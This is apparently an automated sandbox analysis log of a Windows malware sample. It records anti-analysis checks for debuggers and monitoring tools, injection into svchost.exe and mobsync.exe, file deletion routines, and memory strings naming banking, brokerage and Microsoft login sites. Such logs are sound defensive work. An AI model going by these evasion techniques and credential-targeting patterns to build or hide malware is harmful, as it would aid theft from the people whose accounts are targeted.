Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_005D48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_005D48D7
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00655376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00655376

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_005F3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_005F3187

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	API/Special instruction interceptor: Address: F26284
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: M7XS5C07kV.exe, 00000000.00000003.1433395505.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1433063073.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000002.1456728035.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1433526743.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1433741655.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1432225548.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1433864340.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1431476524.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXEXE
Source: M7XS5C07kV.exe, 00000000.00000003.1433395505.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1433063073.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000002.1456728035.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1433526743.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1433741655.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1432225548.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1433864340.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1431476524.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE)

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0387096E rdtsc

2_2_0387096E

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	API coverage: 4.7 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\mobsync.exe	API coverage: 2.4 %

Source: C:\Windows\SysWOW64\mobsync.exe TID: 3396	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe TID: 3396	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe TID: 6676	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mobsync.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0063445A
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063C6D1 FindFirstFileW,FindClose,	0_2_0063C6D1
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0063C75C
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0063EF95
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0063F0F2
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0063F3F3
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_006337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006337EF
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00633B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00633B12
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0063BCBC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0041C560 FindFirstFileW,FindNextFileW,FindClose,	5_2_0041C560

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_005D49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_005D49A0

Source: 10O4645j.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: 10O4645j.5.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 10O4645j.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 10O4645j.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 10O4645j.5.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 10O4645j.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 10O4645j.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 10O4645j.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 10O4645j.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: JqFbrQRYIbA.exe, 00000006.00000002.3296826351.000000000031F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: firefox.exe, 00000008.00000002.1984357348.000001AA4674C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 10O4645j.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 10O4645j.5.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 10O4645j.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 10O4645j.5.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: mobsync.exe, 00000005.00000002.3296697636.0000000000749000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
Source: 10O4645j.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 10O4645j.5.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 10O4645j.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 10O4645j.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 10O4645j.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 10O4645j.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

API call chain: ExitProcess graph end node

graph_0-101141

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0387096E rdtsc

2_2_0387096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417543 LdrLoadDll,

2_2_00417543

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_00643F09 BlockInput,

0_2_00643F09

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_005D3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_005D3B3A

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_00605A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00605A7C

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_005D4B37 LoadLibraryA,GetProcAddress,

0_2_005D4B37

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00F264F0 mov eax, dword ptr fs:[00000030h]	0_2_00F264F0
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00F26550 mov eax, dword ptr fs:[00000030h]	0_2_00F26550
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00F24ED0 mov eax, dword ptr fs:[00000030h]	0_2_00F24ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]	2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]	2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]	2_2_038EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]	2_2_038B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]	2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]	2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]	2_2_038663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]	2_2_0382C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]	2_2_03850310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]	2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]	2_2_038D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390634F mov eax, dword ptr fs:[00000030h]	2_2_0390634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]	2_2_038D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]	2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]	2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]	2_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]	2_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h]	2_2_039062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]	2_2_0382823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]	2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]	2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390625D mov eax, dword ptr fs:[00000030h]	2_2_0390625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]	2_2_0382A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]	2_2_03836259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]	2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]	2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]	2_2_0382826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
